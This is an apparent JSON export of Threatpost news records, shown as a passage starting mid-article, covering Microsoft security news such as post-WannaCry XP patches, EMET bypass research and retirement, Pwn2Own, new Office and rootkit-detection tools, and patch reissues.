\u201cBased on an assessment of the current threat landscape by our security engineers, we made the decision to make updates available more broadly.\u201d\n\nSince WannaCry, security experts have been warning Windows admins about the ferocity of the EternalBlue exploit and that it could be loaded with [any sort of payload](<https://threatpost.com/next-nsa-exploit-payload-could-be-much-worse-than-wannacry/125743/>), including wiper malware, banking Trojans, or more ransomware. Attackers have already on two occasions used it to spread cryptocurrency mining utilities.\n\nIt\u2019s unknown whether Microsoft was given any advance warning of another upcoming leak or if there are rumblings of another WannaCry-style attack. The ShadowBrokers promised monthly leaks of anything from Windows 10 exploits to mobile attacks to stolen nuclear and missile data in a new subscription service it promised to start next month.\n\nMicrosoft also maintained that organizations should long ago have moved away from older, unsupported platforms such as XP. Windows 10, for example, contains many new mitigations that prevent exploits such as EternalBlue from successfully compromising computers. 
Opponents of today\u2019s move\u2014and of the May 12 emergency update\u2014contend that these concessions on Microsoft\u2019s part to provide these types of updates will allow organizations to rationalize staying on unsupported versions of Windows.\n", "cvss3": {}, "published": "2017-06-13T15:34:53", "type": "threatpost", "title": "Risk of 'Destructive Cyber Attacks' Prompts Microsoft to Update XP Again", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2017-06-13T19:35:24", "id": "THREATPOST:F9FEB3F0862AAD4CC618F9737F44FA7B", "href": "https://threatpost.com/risk-of-destructive-cyber-attacks-prompts-microsoft-to-update-xp-again/126235/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:25", "description": "Microsoft has hired yet another well-known security researcher to join its ever-growing team of exploit and defense experts. This time it\u2019s Ken Johnson, known in the hacker world as [Skywing](<http://www.nynaeve.net/>). Johnson is known as an expert on debugging and reverse engineering, and has done a tremendous amount of work [tearing apart Windows defenses](<http://www.uninformed.org/?v=2&a=4>) specifically.\n\nBefore moving to Microsoft, Johnson was working for Positive Networks, a VPN provider. In a [blog post](<http://blogs.msdn.com/michael_howard/archive/2009/03/24/ken-johnson-skywing-joins-microsoft.aspx>) announcing Johnson\u2019s hiring, Microsoft software security guru Mike Howard praised Johnson\u2019s experience and skill. \n\n\u201cKen brings an enormous amount of reverse engineering and defense-subversion skill to Microsoft. Ken will be working on anything and everything related vulnerabilities, exploits, defenses, bypassing defenses and more,\u201d Howard said.\n\nJohnson\u2019s hiring is the latest in a series of interesting personnel moves for Microsoft\u2019s security group. 
The changes essentially began about three years ago when Adam Shostack joined Microsoft. Shostack is a well-known security and privacy expert and had spent years in start-ups and smaller organizations and was not afraid to be critical of Microsoft\u2019s policies. \n\n\u201cIn the past, I\u2019ve [heaped scorn](<http://www.securityfocus.com/news/315>) on Microsoft\u2019s security related decisions. Over the last few years, I\u2019ve watched Microsoft embrace security. I\u2019ve watched them make very large investments in security, including hiring my friends and colleagues. And really, I\u2019ve watched them produce results,\u201d Shostack wrote in a [blog post at the time of his hiring at Microsoft](<http://www.emergentchaos.com/archives/2006/06/im_joining_microsoft.html>). \n\nThen in January 2008 Microsoft hired Crispin Cowan, an expert on Linux and open-source security who was the brains behind the Immunix security-enhanced Linux distribution. And a few months later Matt Miller joined Microsoft, as well. Known as [Skape](<http://hick.org/~mmiller/>), Miller was a big part of HD Moore\u2019s [Metasploit Project](<http://metasploit.org/>) team and is known for his work on exploitation techniques.\n\nGiven the emphasis that Microsoft has placed on anti-exploitation and memory protection in its most recent releases, including Vista and Internet Explorer 8, it stands to reason that the company will continue to bring in more of the people who have done work on the other side of that fence. There\u2019s no defense like a good offense. 
\n", "cvss3": {}, "published": "2009-03-25T15:27:43", "type": "threatpost", "title": "Ken \"Skywing\" Johnson joins Microsoft security team", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:29", "id": "THREATPOST:088C4C91495F7C7262D861A66DC74B85", "href": "https://threatpost.com/ken-skywing-johnson-joins-microsoft-security-team-032509/72482/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:02", "description": "Threat modeling has been part of the security culture at Microsoft for the better part of a decade, an important piece of the Security Development Lifecycle that\u2019s at the core of Trustworthy Computing.\n\nToday, Microsoft updated its free Threat Modeling Tool with a number of enhancements that bring the practice closer to not only large enterprises, but also smaller companies with a growing target on their back.\n\nFour new features have been added to the tool, including enhancements to its visualization capabilities, customization features, migration of older models and threat definitions, as well as a change to how it generates threats.\n\n\u201cMore and more of the customers I have been talking to have been leveraging threat modeling as a systematic way to find design-level security and privacy weaknesses in systems they are building and operating,\u201d said Tim Rains, a Trustworthy Computing manager. \u201cThreat modeling is also used to help identify mitigations that can reduce the overall risk to a system and the data it processes. Once customers try threat modeling, they typically find it to be a useful addition to their approach to risk management.\u201d\n\nThe first iteration of Microsoft Threat Modeling Tool was issued in 2011, but Rains said customer feedback and suggestions for improvements since then have been rolled into this update. 
The improvements include a new drawing surface that no longer requires Microsoft Visio to build data flow diagrams. The update also includes the ability to migrate older, existing threat models built with version 3.1.8 to the new format. Users can also upload existing custom-built threat definitions into the tool, which also comes with its own definitions.\n\nThe biggest change in the new version is in its threat-generation logic. Where previous versions followed [the STRIDE framework](<http://msdn.microsoft.com/en-us/magazine/cc163519.aspx>) (Spoofing, Tampering, Repudiation, Information disclosure, Denial of service, and Elevation of privilege) per element, this one follows STRIDE per interaction of those elements. STRIDE helps users map threats to the properties guarding against them, for example, spoofing maps to authentication.\n\n\u201cWe take into consideration the type of elements used on the diagram (e.g. processes, data stores etc.) and what type of data flows connect these elements,\u201d Rains said.\n\nAt the RSA Conference in February, Trustworthy Computing program manager Adam Shostack said that there is [no one defined way to model threats](<http://threatpost.com/threat-modeling-legos-and-dancing-babies/104517>); that they must be specific to organizations and their particular risks.\n\n\u201cI now think of threat modeling like Legos. There are things you can snap together and use what you need,\u201d Shostack said. \u201cThere\u2019s no one way to threat model. 
The right way is the way that fixes good threats.\u201d\n", "cvss3": {}, "published": "2014-04-15T15:07:23", "type": "threatpost", "title": "Microsoft Releases Free Threat Modeling Tool 2014", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-04-17T19:50:40", "id": "THREATPOST:5C4C4351A746ADF8A7F1B2D316888C01", "href": "https://threatpost.com/microsoft-releases-updated-threat-modeling-tool-2014/105467/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:32", "description": "Microsoft\u2019s research unit is investing resources in a new Web browser that could eventually signal a shift away from the ubiquitous Internet Explorer.\n\nAccording to a research paper released this week, the project is called Gazelle and is positioned as a secure web browser constructed as a multi-principal operating system.\n\nFrom [the research paper](<http://research.microsoft.com/pubs/79655/gazelle.pdf>) (.pdf):\n\nGazelle\u2019s Browser Kernel is an operating system that exclusively manages resource protection and sharing across web site principals. This construction exposes intricate design issues that no previous work has identified, such as legacy protection of cross-origin script source, and cross-principal, cross-process display and events protection. 
We elaborate on these issues and provide comprehensive solutions.\n\nOur prototype implementation and evaluation experience indicates that it is realistic to turn an existing browser into a multi-principal OS that yields significantly stronger security and robustness with acceptable performance and backward compatibility.\n\nMore [at Slashdot](<http://tech.slashdot.org/article.pl?sid=09/02/22/1724244>).\n", "cvss3": {}, "published": "2009-03-03T20:45:46", "type": "threatpost", "title": "Microsoft researching new (secure) browser", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:39", "id": "THREATPOST:490FB5EEC7306F4AF2F0990C85BAB0EC", "href": "https://threatpost.com/microsoft-researching-new-secure-browser-030309/72358/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:19", "description": "SAN FRANCISCO \u2014 Researchers at Bromium Labs are expected to announce today they have developed an exploit that bypasses all of the mitigations in Microsoft\u2019s Enhanced Mitigation Experience Toolkit (EMET). 
Principal security researcher Jared DeMott is scheduled to deliver a presentation this morning at the Security BSides conference explaining how the company\u2019s researchers were able to bypass all of the memory protections offered within the free Windows toolkit.\n\nThe work is significant given that Microsoft has been quick to urge customers to install and run EMET as a [temporary mitigation against zero-day exploits](<http://threatpost.com/microsoft-to-patch-tiff-zero-day-wait-til-next-year-for-xp-zero-day-fix/103117>) targeting memory vulnerabilities in Windows or Internet Explorer.\n\nEMET is not meant to be a permanent fix; instead it is supposed to terminate or block actions by malware or exploits threatening previously unreported vulnerabilities until a patch is available.\n\nMicrosoft is expected to release the latest version of EMET this week during the RSA Conference; Rahul Kashyap, chief security architect at Bromium, said the company has been working closely with Microsoft and expects the vulnerability to be addressed in the new EMET release.\n\nEMET comes with a dozen different mitigations starting with Data Execution Prevention and Address Space Layout Randomization, two key memory protections in Windows, as well as a handful of mitigations against return-oriented programming (ROP), heap spray and SEHOP mitigations, and more.\n\nKashyap said Bromium\u2019s technique bypasses all of EMET\u2019s mitigations, unlike previous bypasses that were able to beat only certain aspects of the tool.\n\n\u201cWe analyzed all of the protections, and took an IE exploit and then we kept on tweaking the exploit payload until we were able to bypass all the mitigations available in EMET,\u201d Kashyap said. \u201cEverything is bypassed in its latest version.\u201d\n\nKashyap said EMET has raised the bar significantly for exploit writers trying to beat Windows\u2019 protections. 
Malware writers, such as those behind [Operation SnowMan targeting the latest IE zero-day](<http://threatpost.com/new-ie-10-zero-day-targeting-military-intelligence/104272>), have taken to adding modules that scan computers for EMET libraries and will not execute if EMET is installed.\n\n\u201cEMET, like any other tool, needs to know exploitation vectors to be able to block them. We tried to attack that very core, fundamental architectural drawback that most tools today have, which is you need to detect an exploit in order to protect,\u201d Kashyap said. \u201cIn this case, we studied the mitigations available in EMET and then we tweaked a payload to create a new vector variant which could bypass the existing mitigations.\u201d\n\nIn a [paper](<http://labs.bromium.com/>) released today, DeMott explained that the researchers intended initially to target just the five ROP protections in EMET with a real-world browser exploit. The project grew to include all relevant protections including stack pivot protection, shellcode complete with an EAF bypass and more, DeMott wrote.\n\n\u201cThe impact of this study shows that technologies that operate on the same plane of execution as potentially malicious code, offer little lasting protection,\u201d DeMott wrote. \u201cThis is true of EMET and other similar userland protections.\u201d\n\nBromium said its research focused on 32-bit Windows 7 systems running EMET 4.0 and 4.1 (ROP protection is not implemented for 64-bit processes, the paper said). ROP is an exploitation technique that evolved from ret2libc, which enables an attacker to inject and execute code by re-using code that already exists. The ROP technique changes executable permissions in memory space, DeMott explained in the paper, in order to execute the attacker\u2019s code located elsewhere. An attacker must chain together a series of processes in order for ROP to succeed.\n\nEMET has been bypassed numerous times before. 
Researcher [Aaron Portnoy](<http://thunkers.net/~deft/presentations/SummerCon%202013/Aaron_Portnoy-Bypassing_All_Of_The_Things.pptx>), cofounder of Exodus Intelligence, presented a paper during last year\u2019s SummerCon that explained a number of EMET bypasses. Two years ago, a researcher in Iran named Shahriyar Jalayeri reported [two bypasses of EMET\u2019s five ROP protections](<http://threatpost.com/researcher-finds-technique-bypass-microsofts-emet-protections-080912/76895>).\n\nYou can expect researchers to continue to try to poke holes in EMET. The upcoming Pwn2Own contest at the CanSecWest Conference is offering a $150,000 grand prize to anyone able to [bypass EMET running on Windows 8.1 and Internet Explorer 11](<http://threatpost.com/pwn2own-paying-150000-grand-prize-for-microsoft-emet-bypass/104015>).\n", "cvss3": {}, "published": "2014-02-24T08:43:50", "type": "threatpost", "title": "Complete Microsoft EMET Bypass Developed", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-02-26T23:48:50", "id": "THREATPOST:37854AF8C9A75E43ACA98BD95205B6BC", "href": "https://threatpost.com/researchers-develop-complete-microsoft-emet-bypass/104437/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:04", "description": "[Howard Schmidt](<https://threatpost.com/obama-cybersecurity-chief-other-nations-key-securing-cyberspace-061311/>), the top White House information security adviser, is retiring after more than two years on the job and several decades in security both in government and private industry. 
Schmidt is in his second stint as the White House security chief and he\u2019s leaving at a time when cybersecurity has moved into the top tier of military and economic concerns for the country.\n\nThe departure is a blow to the Obama administration\u2019s efforts on cybersecurity and comes at a time when the White House is wrangling with Congress on legislation designed to address various information security problems and weaknesses. There are competing proposals in Congress right now and one of the major sticking points has been what kind of information companies will be allowed to share with government agencies regarding attacks and vulnerabilities.\n\nSchmidt, who will leave at the end of the month, took on the role of White House cybersecurity coordinator in early 2010 after a varied and long career in security and law enforcement. He was the CISO of Microsoft, an Air Force officer and had earlier served as the top cybersecurity officer in the George W. Bush administration. After Obama took office, the top information security job was vacant for quite a while and word at the time was that the job had been offered to a variety of top executives in the security industry, but no one had been interested.\n\nThe position was seen as having a lot of prestige, but not much in the way of power because the responsibility for information security inside the federal government is so splintered. The Department of Homeland Security, U.S. Cyber Command, National Security Agency and other groups all have some sort of responsibility for security. There were not many takers for the job of throwing a rope around all of that mess and trying to work with the private sector and other governments to fight cybercrime.\n\n\u201cThe private sector in the prevention of crime is very key, and, once again, look at a continuum. 
The products that are created, whether it\u2019s software or hardware, become more resistant to some of the things that we see out there, whether it\u2019s phishing/spearphishing, whether it\u2019s vulnerabilities in software and hardware where private sector has a lead role in being able to reduce that from taking place,\u201d [Schmidt said in an interview](<https://threatpost.com/obama-cybersecurity-chief-other-nations-key-securing-cyberspace-061311/>) last year.\n\n\u201cThe other piece, as when we look at some of the things like the National Cyber Security Alliance here in the U.S., we look at some of the other partnerships that take place in Australia, Canada, U.K. and how they work with the private sector, just even some of the messaging thing about how to protect your identity online. ENISA, the European Network Information Security Agency has done a lot of really good work in what they call the AR Group, the Awareness Raising Group that puts together some best practices for consumers and businesses and everything. So, working with the private sector is really key, because they can not only help build the technology that reduces the likelihood of becoming a victim, but they can also help spread the message with their customers.\u201d\n\nSchmidt will be replaced in the White House by Michael Daniel, who works in the budget office, according to a report in the [Washington Post](<http://www.washingtonpost.com/world/national-security/white-houses-cybersecurity-official-retiring/2012/05/16/gIQAX6fmUU_story.html>). Daniel has worked on intelligence and security issues for several years.\n\nOne of the major initiatives undertaken by the White House during Schmidt\u2019s tenure was the development of the National Strategy for Trusted Identities in Cyberspace, a blueprint for the adoption of non-password based online identities. 
Schmidt said he saw the development of alternative authentication methods as a key for improving security.\n\n\u201cWe\u2019re starting to see a lot of these companies working with other companies to make sure we\u2019re looking at the full breadth of things, not only the one-time password that may be on your mobile device, but also what can we do to make sure that somebody doesn\u2019t wind up hijacking that through some other sort of mechanism? So, overall, I think there\u2019s a full recognition of the challenges we have moving forward. The people that I\u2019ve talked to in the national program office I\u2019ve talked with recognize that the status quo doesn\u2019t apply here, that we can take a lot from the experiences we\u2019ve had in the past and the next generation of trusted identities or strong authentication or in-person proofing, we can much improve over where we\u2019ve been to date, so very, very positive,\u201d he said in the [2011 interview with Threatpost](<https://threatpost.com/schmidt-white-house-feels-very-positive-about-prospects-data-breach-bill-passing-061411/>).\n", "cvss3": {}, "published": "2012-05-17T14:54:17", "type": "threatpost", "title": "White House Security Czar Howard Schmidt Retiring", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:13", "id": "THREATPOST:B4AED814955E51C42BAE9BF0A3A014B0", "href": "https://threatpost.com/white-house-security-czar-howard-schmidt-retiring-051712/76577/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:27", "description": "[](<https://threatpost.com/cansecwest-caution-community-play-031909/>)\n\nCanSecWest, in beautiful Vancouver BC, is one of my favorite conferences each year. It\u2019s a cozy little security con that brings together security researchers from all parts of the security ecosystem. 
Like a [PhNeutral](<http://ph-neutral.darklab.org/>) or a [BlueHat](<http://technet.microsoft.com/en-us/security/cc261637.aspx>), one never quite knows what to expect out of a CanSecWest, but we do know that Microsoft products and engineers will play a prominent role. We\u2019ll be presenting new security innovations and new tools, we\u2019ll be watching Pwn2Own closely for possible hacks, and we\u2019ll be happy to discuss our industry best practices in the hallway track.\n\nSecurity gatherings such as this allow the ecosystem to exchange information and awareness in order to become more secure. The more we know about the attacks, the better prepared we can be on defense. Presentations like Matt Miller\u2019s \u201cThe Evolution of Microsoft\u2019s Exploit Mitigations\u201d and Jason Shirk and Dave Weinstein\u2019s \u201cAutomated Real-time and Post Mortem Security Crash Analysis and Categorization\u201d demonstrate that as Microsoft learns more about an attack, we incorporate this information into techniques and tools that we share with our developer community. Stay tuned for more news and posts throughout the show.\n\n**[ SEE: **[**Android, iPhone security under scrutiny at CanSecWest**](<https://threatpost.com/android-iphone-security-under-scrutiny-cansecwest-031809/>)** ]**\n\nAgain this year, [CanSecWest features the Pwn2Own contest](<http://cansecwest.com/post/2009-03-18-01:00:00.PWN2OWN_Final_Rules>) \u2013 a contest that pits researchers against technologies to see whether technology or human wins. It\u2019s also a contest that presents interesting challenges to Microsoft and a contest which you might think Microsoft opposes. Like many other issues in the security ecosystem \u2013 it\u2019s not that simple. The contest exemplifies two basic tenets behind the TwC Security teams\u2019 efforts. 
You can\u2019t hide from the truth (wishing doesn\u2019t make it so) and every issue is an opportunity to learn and improve.\n\nWe recognize that all vendors\u2019 products may be found vulnerable and Microsoft welcomes the contest as another opportunity to engage the security community in productive dialogue around responsible disclosure and effective security engineering. We also see that Pwn2Own provides an opportunity to educate the public and we believe it can showcase Microsoft\u2019s security engineering efforts, both relative to our competitors and in an absolute sense.\n\n**[ SEE: [Pwn2Own trifecta: Hacker exploits IE8, Firefox, Safari](<https://threatpost.com/pwn2own-trifecta-hacker-exploits-ie8-firefox-safari-031809/>) ]**\n\nThe security community is offering knowledge of attacks and defenses that consumers and other vendors can use to stay safe or create more secure products. The rest of the story \u2013 and an additional measure the security community could use to evaluate vendors\u2019 products \u2013 is what happens after the contest ends. Rest assured Microsoft will take this information and apply it towards securing our networks, platforms and applications (hopefully before they ship), and to create the strong response processes and engineering discipline that are necessary for our communal security. And as always, the MSRC is ready to investigate any vulnerabilities that researchers might find during the Pwn2Own contest.\n\n**[ SEE: **[**Paul Roberts: Mobile security can no longer be ignored**](<https://threatpost.com/mobile-security-can-no-longer-be-ignored-031809/>)** ]**\n\nBy the end of the contest, co-sponsor [Tipping Point](<http://www.zerodayinitiative.com/about/>) will be the owners of many new vulnerabilities. They value the protection of their customers and will need to work with their partners in the security ecosystem to make sure everybody is protected as quickly as possible (one more way consumers benefit). 
One of the goals of responsible disclosure is for the vulnerability details to emerge at the same time that an update is available from the vulnerable vendor. The CanSecWest conference organizer also has a responsible disclosure policy, as do all of the conference organizers that the EcoStrat team is able to support worldwide each year.\n\nAlthough innovative contests put some of us in a place that is not always comfortable, it\u2019s valuable for the ecosystem to come together with contests like Pwn2Own and Iron Chef Black Hat, to better understand and solve common issues. It\u2019s yet another example of the \u201cteam of rivals\u201d strategy. Let the contest begin!\n\n_* Sarah Blankinship is a senior security strategist lead in Microsoft\u2019s Ecosystem Strategy team._\n", "cvss3": {}, "published": "2009-03-19T15:40:46", "type": "threatpost", "title": "CanSecWest: Caution, community at play", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-05-03T18:00:20", "id": "THREATPOST:9B11E0EF22481CA407924C58E8C7F8C1", "href": "https://threatpost.com/cansecwest-caution-community-play-031909/72396/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:05:46", "description": "In parallel with its release of 17 bulletins on Patch Tuesday this month, Microsoft also unveiled two new tools that are meant to help make a couple of common exploitation scenarios more difficult for attackers.\n\nThe company released a tool called Office File Validation for some older versions of Office, including Office 2003 and 2007. The feature is specifically designed to give users information about whether there\u2019s a potentially malicious component in an Office file that the user is trying to open. When the user attempts to open a file, the Office File Validation tool will inspect it and look for any signs of malicious behavior. 
If there\u2019s a problem, the user will get a warning dialog box giving him the opportunity to cancel the operation.\n\nAttackers in the past few months have taken to embedding malicious Flash files inside Word and Excel documents as part of spear phishing campaigns. This was the primary attack vector used to compromise RSA last month.\n\n\u201cOffice File Validation helps detect and prevent a kind of exploit known as a file format attack. File format attacks exploit the integrity of a file, and occur when the structure of a file is modified with the intent of adding malicious code. Usually the malicious code is run remotely and is used to elevate the privilege of restricted accounts on the computer. As a result, an attacker could gain access to a computer that was not previously accessible,\u201d Microsoft said in its [advisory on the validation tool](<https://www.microsoft.com/technet/security/advisory/2501584.mspx>).\n\n\u201cThis could enable an attacker to read sensitive information from the computer\u2019s hard disk drive or to install malware, such as a worm or a key logging program. The Office File Validation feature helps prevent file format attacks by scanning and validating files before they are opened. To validate files, Office File Validation compares a file\u2019s structure to a predefined file schema, which is a set of rules that define what a readable file looks like. If Office File Validation detects that a file\u2019s structure does not follow all rules described in the schema, the file does not pass validation.\u201d\n\nThe second enhancement Microsoft pushed out on Tuesday is an [update to winload.exe](<https://www.microsoft.com/technet/security/advisory/2506014.mspx>), the component that loads Windows. 
The update is designed to help prevent some techniques that rootkits use to evade detection and remain persistent on infected machines.\n\n\u201cFor a rootkit to be successful it must stay hidden and persistent on a system. One way we have seen rootkits hide themselves on 64-bit systems is bypassing driver signing checks done by winload.exe. While the update itself won\u2019t remove a rootkit, it will expose an installed rootkit and give your anti-malware software the ability to detect and remove the rootkit,\u201d Microsoft\u2019s Dustin Childs said.\n", "cvss3": {}, "published": "2011-04-12T19:00:28", "type": "threatpost", "title": "Microsoft Pushes Out Two New Security Tools", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:34:45", "id": "THREATPOST:769E9696F176FD575D7F365CA771EFC3", "href": "https://threatpost.com/microsoft-pushes-out-two-new-security-tools-041211/75129/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:54:29", "description": "Microsoft last week extended the end-of-life expiration date to July 2018 on its exploit mitigation add-on, the Enhanced Mitigation Experience Toolkit (EMET). But for some time, the once-useful tool has been well on its way out to pasture.\n\nWhile EMET was never meant to be anything more than stopgap protection against exploits, attackers and white-hat researchers accelerated its demise with a number of publicized [bypass attacks](<https://threatpost.com/microsoft-emet-bypasses-realm-of-white-hats-for-now/104619/>). That situation, plus Microsoft\u2019s urgency to have users migrate to Windows 10 and the array of new memory mitigations included in the latest OS has brought the curtain down on EMET.\n\n\u201cIt was a stopgap. It was never supposed to be something [Microsoft] wanted people to use long-term,\u201d said Cody Pierce, director of vulnerability research at Endgame. 
\u201cThey want people to upgrade to Windows 10; for the good of their customers, they want to transition them to Windows 10 where there are some protections baked into the operating system.\u201d\n\nForemost is Control Flow Guard, a technology built to counter memory-corruption vulnerabilities, which has been available since Visual Studio 2015 and is also built into Windows 10 and Windows 8.1. [Control Flow Guard](<https://threatpost.com/bypass-developed-for-microsoft-memory-protection-control-flow-guard/114768/>) is thought to be a primary impediment to [use-after-free attacks](<https://threatpost.com/bypass-demonstrated-for-microsoft-use-after-free-mitigation-in-ie/110570/>), which became a favorite exploit once ASLR and DEP put a damper on buffer overflow attacks.\n\n\u201cThere are a lot more compile time mitigations [in Windows 10] like Control Flow Guard, and a new Return Flow Guard feature,\u201d said Darren Kemp, security researcher with Duo Security. Kemp also pointed out that since Windows 10\u2019s mitigations are integrated into the operating system, unlike EMET, there are fewer instances where users will notice a performance hit, which was increasingly common with EMET. Also, EMET required close care when configuring it to work, otherwise it could break certain application processes.\n\n\u201cSince it\u2019s not integrated, you don\u2019t get the same type of tight coupling,\u201d Kemp said. \u201cWith a lot of stuff in EMET, you have to test the software you\u2019re applying it to, to make sure the mitigations don\u2019t cause problems. It hooks into functions and injects features. If software does non-standard things, it can cause problems with those apps.\u201d\n\nMicrosoft, meanwhile, has not had EMET on a consistent upgrade path since version 5.0 dropped in 2014. This was an abrupt change from the early days when EMET was introduced and exploits were unleashed within days of Patch Tuesday releases. 
In announcing the deadline extension to July 31, 2018, Microsoft\u2019s Jeffrey Sutherland acknowledged EMET\u2019s limitations against modern advanced attacks, its performance and reliability shortcomings, and urged users toward Windows 10, which makes the most of hardware virtualization to sandbox applications and links before they can harm the operating system.\n\n\u201cWith the types of threats enterprises face today, we are constantly reminded of this simple truth: modern defense against software vulnerabilities requires a modern platform,\u201d Sutherland said.\n\nThe true value of any mitigation continues to be how well it raises the cost of attacks. Pierce illustrated how advanced attackers have blown well past EMET\u2019s [menu of mitigations](<https://technet.microsoft.com/en-us/security/jj653751>) with advanced logic that automates many facets of an attack that its defenses cannot keep up with.\n\n\u201cIf you\u2019re an exploit kit writer and you acquire a zero day or develop an exploit, you have to get the most bang for your buck; and part of that is supporting a wide range of targets. If you\u2019ve got a Flash exploit, you want it to work on Firefox, Windows, Linux and more and you have to come up with ways to make it easier on you,\u201d Pierce said. \u201cA lot of the ways they\u2019ve figured out to do that bypasses a lot of these late-hook defenses like EMET. They\u2019re getting more value out of it. The types of exploit mitigations EMET provides were limited in utility due to the nature of exploitation. If you look at an exploit kit from 2010, it looks wildly different than it does now.\u201d\n\nDuo\u2019s Kemp, meanwhile, says Windows 10 is one of the hardest targets to breach today.\n\n\u201cThat\u2019s the nature of this stuff: raising the bar. 
If you\u2019re an attacker, do you want to invest a lot of time and energy to figure out a way around this, or are you going to go after something else?\u201d Kemp said.\n", "cvss3": {}, "published": "2016-11-07T13:50:00", "type": "threatpost", "title": "Microsoft Tears off the Band-Aid with EMET", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2016-11-15T14:12:29", "id": "THREATPOST:714DD68C5B32F675D9C75A67D7288B65", "href": "https://threatpost.com/microsoft-tears-off-the-band-aid-with-emet/121824/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:54", "description": "Microsoft has released a new version of the MS13-036 patch that was causing some customers\u2019 machines to crash. The company had recommended in the days after the original fix was first released that customers [uninstall the MS13-036 patch](<http://threatpost.com/microsoft-uninstall-faulty-patch-tuesday-security-update-041213/>) while Microsoft investigated the cause of the problems.\n\nThe new fix that Microsoft released on Tuesday resolves some conflicts with third-party applications that apparently were causing the blue screen issues for some people. The company didn\u2019t specify which software was causing the crashes, but said that the update should resolve the problems.\n\n\u201cWe\u2019ve determined that the update, when paired with certain third-party software, can cause system errors,\u201d said Trustworthy Computing group manager Dustin Childs at the time that the patch was recalled earlier this month.\n\nThe MS13-036 patch fixes a pair of race condition vulnerabilities in the Windows kernel, both of which could be used for code execution. 
However, the patch was rated important rather than critical because an attacker would need physical access to a vulnerable machine in order to run code using one of these bugs.\n\nChilds said in a blog post Tuesday that customers should install the revised update as soon as possible.\n\n\u201cAs we [previously discussed](<http://blogs.technet.com/b/msrc/archive/2013/04/11/kb2839011-released-to-address-security-bulletin-update-issue.aspx> \"previously discussed\" ), we stopped distributing this update when we learned some customers were having issues. The new update, [KB2840149](<http://support.microsoft.com/kb/2840149> \"KB2840149\" ), still addresses the Moderate security issue described in MS13-036, and should not cause these issues. If you have automatic updates enabled, you won\u2019t need to take any actions. For those manually updating, we encourage you to apply this update at your earliest convenience,\u201d he said.\n", "cvss3": {}, "published": "2013-04-24T10:00:23", "type": "threatpost", "title": "Microsoft Releases Updated MS13-036 Patch", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-24T14:02:36", "id": "THREATPOST:2C798ED7D1CE36B13D82410EA1C94D9F", "href": "https://threatpost.com/microsoft-releases-updated-ms13-036-patch/99885/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:54", "description": "In the space of a given year, untold thousands of vulnerabilities are found in operating systems, applications and plug-ins. In many cases, the affected vendors fix the flaws, either with a patch, a workaround or some other mitigation. 
But there\u2019s also a huge population of security bugs that vendors never fix because they\u2019re deemed unexploitable, an assumption that may be turning into a serious mistake for software makers.\n\nMicrosoft made such a call earlier this year, after [researchers at Core Security](<http://www.coresecurity.com/content/virtual-pc-2007-hypervisor-memory-protection-bug>) informed the company that they had found a [vulnerability in the Microsoft Virtual PC software](<https://threatpost.com/microsoft-virtual-pc-flaw-lets-hackers-bypass-windows-defenses-031610/>). The flaw, which affected the virtual machine monitor (VMM) in Virtual PC, could enable an attacker to use applications running in user-space on a guest OS to access portions of the Virtual PC memory that should be inaccessible to those applications. This gives the attacker the ability to bypass anti-exploitation technologies in the underlying operating system and exploit flaws in the OS that otherwise would not be exploitable.\n\nThis problem was especially thorny for Microsoft because Virtual PC allows Windows 7 users to run applications designed for older Windows versions in a virtualized environment on their Windows 7 machines. This functionality has helped the deployment of Windows 7 in enterprise environments by making more legacy apps viable.\n\nBut Microsoft\u2019s security team said that the [Virtual PC problem was not actually a vulnerability](<http://windowsteamblog.com/blogs/windowssecurity/archive/2010/03/16/vulnerability-in-virtual-pc.aspx>) and the company hasn\u2019t released a fix for it.\n\n\u201cThe functionality that Core calls out **is not an actual vulnerability** per se. Instead, they are describing a way for an attacker to more easily exploit security vulnerabilities that must already be present on the system. It\u2019s a subtle point, but one that folks should really understand. 
